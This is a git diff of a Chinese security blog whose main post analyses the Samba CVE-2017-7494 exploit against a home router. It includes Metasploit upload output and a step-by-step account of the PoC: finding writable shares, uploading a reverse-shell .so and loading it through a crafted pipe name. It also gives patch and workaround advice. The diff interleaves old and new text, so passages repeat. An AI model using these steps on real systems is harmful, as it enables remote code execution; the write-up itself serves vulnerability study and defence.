&apos;data&apos; has server-side path &apos;/tmp</span><br><span class="line">[*] 192.168.31.1:445 - Uploaded payload to \\192.168.31.1\data\KcQiOcbk.so</span><br><span class="line">[*] 192.168.31.1:445 - Loading the payload from server-side path /tmp/KcQiOcbk.so using \\PIPE\/tmp/KcQiOcbk.so...</span><br><span class="line">[-] 192.168.31.1:445 - &gt;&gt; Failed to load STATUS_OBJECT_NAME_NOT_FOUND</span><br><span class="line">[*] 192.168.31.1:445 - Loading the payload from server-side path /tmp/KcQiOcbk.so using /tmp/KcQiOcbk.so...</span><br><span class="line">[-] 192.168.31.1:445 - &gt;&gt; Failed to load STATUS_OBJECT_NAME_NOT_FOUND</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br></pre></td></tr></table></figure>
<p>虽然报错,但是查看共享文件夹/tmp却发现了生成了.so文件<br>知乎这篇<a href="https://zhuanlan.zhihu.com/p/27129229" target="_blank" rel="noopener">专栏</a>也有相同问题</p> <p>虽然报错,但是查看共享文件夹/tmp却发现了生成了.so文件<br>知乎这篇<a href="https://zhuanlan.zhihu.com/p/27129229" target="_blank" rel="noopener">专栏</a>也有相同问题</p>
<h2 id="分析POC查找原因"><a href="#分析POC查找原因" class="headerlink" title="分析POC查找原因"></a>分析POC查找原因</h2><p>(来自<a href="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/" target="_blank" rel="noopener">Wzblog</a>)</p> <h1 id="修补方案"><a href="#修补方案" class="headerlink" title="修补方案"></a>修补方案</h1><p>最安全的方法还是打补丁或者升级到Samba 4.6.4/4.5.10/4.4.14任意版本,可以参考 <a href="https://www.samba.org/samba/history/security.html" target="_blank" rel="noopener">https://www.samba.org/samba/history/security.html</a></p>
<h3 id="建立SMB连接。若需要账号密码登录则必须登录后才能继续"><a href="#建立SMB连接。若需要账号密码登录则必须登录后才能继续" class="headerlink" title="建立SMB连接。若需要账号密码登录则必须登录后才能继续"></a>建立SMB连接。若需要账号密码登录则必须登录后才能继续</h3><p>从微软上扒的SMB协议建立时序图<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-09-40.png" alt></p> <p>如果暂时不能升级版本或安装补丁,可以使用临时解决方案:<br>在smb.conf的[global]板块中添加参数nt pipe support = no<br>然后重启smbd服务。</p>
<h1 id="分析POC查找原因"><a href="#分析POC查找原因" class="headerlink" title="分析POC查找原因"></a>分析POC查找原因</h1><p>(来自<a href="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/" target="_blank" rel="noopener">Wzblog</a>)</p>
<h2 id="建立SMB连接。若需要账号密码登录则必须登录后才能继续"><a href="#建立SMB连接。若需要账号密码登录则必须登录后才能继续" class="headerlink" title="建立SMB连接。若需要账号密码登录则必须登录后才能继续"></a>建立SMB连接。若需要账号密码登录则必须登录后才能继续</h2><p>从微软上扒的SMB协议建立时序图<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-09-40.png" alt></p>
<p>对应POC:</p> <p>对应POC:</p>
<p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/23-15-57.png" alt></p> <p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/23-15-57.png" alt></p>
<h3 id="利用NetShareEnumAll遍历目标服务器的共享名-ShareName-以及获取对应的共享文件夹下的可写路径-Path"><a href="#利用NetShareEnumAll遍历目标服务器的共享名-ShareName-以及获取对应的共享文件夹下的可写路径-Path" class="headerlink" title="利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path)"></a>利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path)</h3><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/00-38-48.jpg" alt></p> <h2 id="利用NetShareEnumAll遍历目标服务器的共享名-ShareName-以及获取对应的共享文件夹下的可写路径-Path"><a href="#利用NetShareEnumAll遍历目标服务器的共享名-ShareName-以及获取对应的共享文件夹下的可写路径-Path" class="headerlink" title="利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path)"></a>利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path)</h2><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/00-38-48.jpg" alt></p>
<p>其中find_writeable_path()函数需要跟进看一下:<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-14-43.jpg" alt></p> <p>其中find_writeable_path()函数需要跟进看一下:<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-14-43.jpg" alt></p>
<p>再跟进看enumerate_directories()以及verify_writeable_directory函数<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/00-48-27.jpg" alt><br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-18-44.jpg" alt></p> <p>再跟进看enumerate_directories()以及verify_writeable_directory函数<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/00-48-27.jpg" alt><br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-18-44.jpg" alt></p>
<p>可以看到代码逻辑很清楚首先遍历出当前路径所有的文件夹然后尝试往里面写一个随机的txt文件用作可写测试随后删除掉txt文件记录下可写的文件路径。<br>至此,我们得到了一个共享名(即本例中的data)以及其当前路径下的可写目录(/tmp)</p> <p>可以看到代码逻辑很清楚首先遍历出当前路径所有的文件夹然后尝试往里面写一个随机的txt文件用作可写测试随后删除掉txt文件记录下可写的文件路径。<br>至此,我们得到了一个共享名(即本例中的data)以及其当前路径下的可写目录(/tmp)</p>
<h3 id="利用NetShareGetInfo获取共享文件夹的绝对路径-SharePath"><a href="#利用NetShareGetInfo获取共享文件夹的绝对路径-SharePath" class="headerlink" title="利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)"></a>利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)</h3><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-26-47.jpg" alt><br>至此获取到了共享名data的绝对路径。<br>值得注意的是这里跟早期的Payload不一样早期的payload是靠暴力猜解目录所以跟一些分析文章有些出入。现在的Payload是根据NetShareGetInfo直接获取到准确的路径极大地提高了攻击的成功率。</p> <h2 id="利用NetShareGetInfo获取共享文件夹的绝对路径-SharePath"><a href="#利用NetShareGetInfo获取共享文件夹的绝对路径-SharePath" class="headerlink" title="利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)"></a>利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)</h2><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-26-47.jpg" alt><br>至此获取到了共享名data的绝对路径。<br>值得注意的是这里跟早期的Payload不一样早期的payload是靠暴力猜解目录所以跟一些分析文章有些出入。现在的Payload是根据NetShareGetInfo直接获取到准确的路径极大地提高了攻击的成功率。</p>
<h3 id="上传恶意so文件"><a href="#上传恶意so文件" class="headerlink" title="上传恶意so文件"></a>上传恶意so文件</h3><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-38-28.jpg" alt><br>其中写入的so文件是Metasploit生成的反弹shell很简单的执行一句命令。有一点需要注意的是里面的函数名必须是samba_init_module并且是一个导出函数这个原因上述的漏洞分析也有提及。</p> <h2 id="上传恶意so文件"><a href="#上传恶意so文件" class="headerlink" title="上传恶意so文件"></a>上传恶意so文件</h2><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-38-28.jpg" alt><br>其中写入的so文件是Metasploit生成的反弹shell很简单的执行一句命令。有一点需要注意的是里面的函数名必须是samba_init_module并且是一个导出函数这个原因上述的漏洞分析也有提及。</p>
<h3 id="调用恶意文件并执行echo命令打印随机字符串检验是否调用成功"><a href="#调用恶意文件并执行echo命令打印随机字符串检验是否调用成功" class="headerlink" title="调用恶意文件并执行echo命令打印随机字符串检验是否调用成功"></a>调用恶意文件并执行echo命令打印随机字符串检验是否调用成功</h3><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-43-02.jpg" alt><br>利用从第2步获取到的可写文件目录(Path)以及从第3步得到的共享文件绝对路径(SharePath)构造恶意管道名\PIPE\/SharePath/Path/Evil.so然后通过SMB_COM_NT_CREATE_ANDX进行调用。<br>在复现时调用恶意so文件总会失败产生Error Code为STATUS_OBJECT_NAME_NOT_FOUND的错误。尚未能明白为什么会出现这种首次失败的情况也许要详细看看smb协议才能知道了。<br>POC代码将STATUS_OBJECT_PATH_INVALID作为我们payload被加载的标志随后就是用NBSS协议进行了一次远程代码执行的测试执行代码为echo随机字符串。</p> <h2 id="调用恶意文件并执行echo命令打印随机字符串检验是否调用成功"><a href="#调用恶意文件并执行echo命令打印随机字符串检验是否调用成功" class="headerlink" title="调用恶意文件并执行echo命令打印随机字符串检验是否调用成功"></a>调用恶意文件并执行echo命令打印随机字符串检验是否调用成功</h2><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-43-02.jpg" alt><br>利用从第2步获取到的可写文件目录(Path)以及从第3步得到的共享文件绝对路径(SharePath)构造恶意管道名\PIPE\/SharePath/Path/Evil.so然后通过SMB_COM_NT_CREATE_ANDX进行调用。<br>在复现时调用恶意so文件总会失败产生Error Code为STATUS_OBJECT_NAME_NOT_FOUND的错误。尚未能明白为什么会出现这种首次失败的情况也许要详细看看smb协议才能知道了。<br>POC代码将STATUS_OBJECT_PATH_INVALID作为我们payload被加载的标志随后就是用NBSS协议进行了一次远程代码执行的测试执行代码为echo随机字符串。</p>
<h3 id="删除恶意so文件断开smb连接"><a href="#删除恶意so文件断开smb连接" class="headerlink" title="删除恶意so文件断开smb连接"></a>删除恶意so文件断开smb连接</h3><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-45-01.png" alt></p> <h2 id="删除恶意so文件断开smb连接"><a href="#删除恶意so文件断开smb连接" class="headerlink" title="删除恶意so文件断开smb连接"></a>删除恶意so文件断开smb连接</h2><p><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-45-01.png" alt></p>
<p>由msf给出的poc过程可见小米路由器的攻击在第五步出现问题因此出现Failed to load STATUS_OBJECT_NAME_NOT_FOUND</p> <p>由msf给出的poc过程可见对路由器的攻击在第五步出现问题因此出现Failed to load STATUS_OBJECT_NAME_NOT_FOUND</p>
</div> </div>
@ -718,7 +721,7 @@
<div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#小米路由器与Samba漏洞CVE-2017-7494"><span class="nav-text">小米路由器与Samba漏洞CVE-2017-7494</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞描述"><span class="nav-text">漏洞描述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Samba介绍"><span class="nav-text">Samba介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞成因"><span class="nav-text">漏洞成因</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞复现"><span class="nav-text">漏洞复现</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#小米路由器"><span class="nav-text">小米路由器</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#攻击使用metasploit"><span class="nav-text">攻击使用metasploit</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#设置攻击参数"><span class="nav-text">设置攻击参数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#执行攻击"><span class="nav-text">执行攻击</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#分析POC查找原因"><span class="nav-text">分析POC查找原因</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#建立SMB连接。若需要账号密码登录则必须登录后才能继续"><span class="nav-text">建立SMB连接。若需要账号密码登录则必须登录后才能继续</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用NetShareEnumAll遍历目标服务器的共享名-ShareName-以及获取对应的共享文件夹下的可写路径-Path"><span class="nav-text">利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用NetShareGetInfo获取共享文件夹的绝对路径-SharePath"><span class="nav-text">利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#上传恶意so文件"><span class="nav-text">上传恶意so文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#调用恶意文件并执行echo命令打印随机字符串检验是否调用成功"><span class="nav-text">调用恶意文件并执行echo命令打印随机字符串检验是否调用成功</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#删除恶意so文件断开smb连接"><span class="nav-text">删除恶意so文件断开smb连接</span></a></li></ol></li></ol></li></ol></div> <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#漏洞描述"><span class="nav-text">漏洞描述</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Samba介绍"><span class="nav-text">Samba介绍</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#漏洞成因"><span class="nav-text">漏洞成因</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#漏洞复现"><span class="nav-text">漏洞复现</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#某路由器满足条件"><span class="nav-text">某路由器满足条件</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#攻击使用metasploit"><span class="nav-text">攻击使用metasploit</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#设置攻击参数"><span class="nav-text">设置攻击参数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#执行攻击"><span class="nav-text">执行攻击</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#修补方案"><span class="nav-text">修补方案</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#分析POC查找原因"><span class="nav-text">分析POC查找原因</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#建立SMB连接。若需要账号密码登录则必须登录后才能继续"><span class="nav-text">建立SMB连接。若需要账号密码登录则必须登录后才能继续</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用NetShareEnumAll遍历目标服务器的共享名-ShareName-以及获取对应的共享文件夹下的可写路径-Path"><span class="nav-text">利用NetShareEnumAll遍历目标服务器的共享名(ShareName)以及获取对应的共享文件夹下的可写路径(Path)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用NetShareGetInfo获取共享文件夹的绝对路径-SharePath"><span class="nav-text">利用NetShareGetInfo获取共享文件夹的绝对路径(SharePath)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#上传恶意so文件"><span class="nav-text">上传恶意so文件</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#调用恶意文件并执行echo命令打印随机字符串检验是否调用成功"><span class="nav-text">调用恶意文件并执行echo命令打印随机字符串检验是否调用成功</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#删除恶意so文件断开smb连接"><span class="nav-text">删除恶意so文件断开smb连接</span></a></li></ol></li></ol></div>
</div> </div>
@ -750,7 +753,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

6
2019/03/28/逆向工程实验/index.html
View File

@ -646,8 +646,8 @@
<div class="post-nav"> <div class="post-nav">
<div class="post-nav-next post-nav-item"> <div class="post-nav-next post-nav-item">
<a href="/2019/03/25/Samba-CVE/" rel="next" title="小米路由器与Samba漏洞CVE-2017-7494"> <a href="/2019/03/25/Samba-CVE/" rel="next" title="某厂商路由器与Samba漏洞CVE-2017-7494">
<i class="fa fa-chevron-left"></i> 小米路由器与Samba漏洞CVE-2017-7494 <i class="fa fa-chevron-left"></i> 某厂商路由器与Samba漏洞CVE-2017-7494
</a> </a>
</div> </div>
@ -853,7 +853,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
2019/04/15/Caving-db-storage/index.html
View File

@ -774,7 +774,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
2019/04/21/XIAOMI-UPnP/index.html
View File

@ -898,7 +898,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
2019/05/13/PE-file/index.html
View File

@ -817,7 +817,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
2019/05/14/pack-and-unpack/index.html
View File

@ -739,7 +739,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
2019/07/01/AFL-first-learn/index.html
View File

@ -1012,7 +1012,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
2019/07/09/afl-first-try/index.html
View File

@ -802,7 +802,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
2019/07/10/x86basic/index.html
View File

@ -834,7 +834,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
2019/07/16/linux-pwn-32/index.html
View File

@ -817,7 +817,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
2019/07/24/web-dvwa/index.html
View File

@ -830,7 +830,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
2019/07/24/获取固件/index.html
View File

@ -713,7 +713,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
2019/07/25/Debug-a-router-firmware/index.html
View File

@ -757,7 +757,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
about/index.html
View File

@ -460,7 +460,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
archives/2000/01/index.html
View File

@ -493,7 +493,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
archives/2000/index.html
View File

@ -493,7 +493,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
archives/2018/11/index.html
View File

@ -493,7 +493,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
archives/2018/12/index.html
View File

@ -563,7 +563,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
archives/2018/index.html
View File

@ -598,7 +598,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
archives/2019/01/index.html
View File

@ -493,7 +493,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
archives/2019/02/index.html
View File

@ -493,7 +493,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

4
archives/2019/03/index.html
View File

@ -363,7 +363,7 @@
<a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url"> <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
<span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span> <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
</a> </a>
@ -598,7 +598,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
archives/2019/04/index.html
View File

@ -528,7 +528,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
archives/2019/05/index.html
View File

@ -528,7 +528,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
archives/2019/07/index.html
View File

@ -703,7 +703,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
archives/2019/index.html
View File

@ -812,7 +812,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

4
archives/2019/page/2/index.html
View File

@ -398,7 +398,7 @@
<a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url"> <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
<span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span> <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
</a> </a>
@ -707,7 +707,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
archives/index.html
View File

@ -812,7 +812,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

4
archives/page/2/index.html
View File

@ -398,7 +398,7 @@
<a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url"> <a class="post-title-link" href="/2019/03/25/Samba-CVE/" itemprop="url">
<span itemprop="name">小米路由器与Samba漏洞CVE-2017-7494</span> <span itemprop="name">某厂商路由器与Samba漏洞CVE-2017-7494</span>
</a> </a>
@ -817,7 +817,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
archives/page/3/index.html
View File

@ -537,7 +537,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

12
baidusitemap.xml
View File

@ -1,6 +1,9 @@
<?xml version="1.0" encoding="UTF-8"?> <?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
<url> <url>
<loc>https://cool-y.github.io/2019/03/25/Samba-CVE/</loc>
<lastmod>2019-07-27</lastmod>
</url> <url>
<loc>https://cool-y.github.io/2019/07/10/x86basic/</loc> <loc>https://cool-y.github.io/2019/07/10/x86basic/</loc>
<lastmod>2019-07-26</lastmod> <lastmod>2019-07-26</lastmod>
</url> <url> </url> <url>
@ -48,23 +51,20 @@
</url> <url> </url> <url>
<loc>https://cool-y.github.io/2018/12/15/miio-control/</loc> <loc>https://cool-y.github.io/2018/12/15/miio-control/</loc>
<lastmod>2019-04-15</lastmod> <lastmod>2019-04-15</lastmod>
</url> <url>
<loc>https://cool-y.github.io/2019/02/22/qq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/</loc>
<lastmod>2019-04-15</lastmod>
</url> <url> </url> <url>
<loc>https://cool-y.github.io/2019/01/16/wifi%E5%8D%8A%E5%8F%8C%E5%B7%A5%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/</loc> <loc>https://cool-y.github.io/2019/01/16/wifi%E5%8D%8A%E5%8F%8C%E5%B7%A5%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/</loc>
<lastmod>2019-04-15</lastmod> <lastmod>2019-04-15</lastmod>
</url> <url> </url> <url>
<loc>https://cool-y.github.io/2000/01/01/hello-world/</loc> <loc>https://cool-y.github.io/2019/02/22/qq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/</loc>
<lastmod>2019-04-15</lastmod> <lastmod>2019-04-15</lastmod>
</url> <url> </url> <url>
<loc>https://cool-y.github.io/2019/03/23/auto-send-WX/</loc> <loc>https://cool-y.github.io/2019/03/23/auto-send-WX/</loc>
<lastmod>2019-04-15</lastmod> <lastmod>2019-04-15</lastmod>
</url> <url> </url> <url>
<loc>https://cool-y.github.io/2018/11/16/BIBA%E8%AE%BF%E9%97%AE%E6%8E%A7%E5%88%B6%E6%A8%A1%E5%9E%8B%E5%AE%9E%E7%8E%B0(python)/</loc> <loc>https://cool-y.github.io/2000/01/01/hello-world/</loc>
<lastmod>2019-04-15</lastmod> <lastmod>2019-04-15</lastmod>
</url> <url> </url> <url>
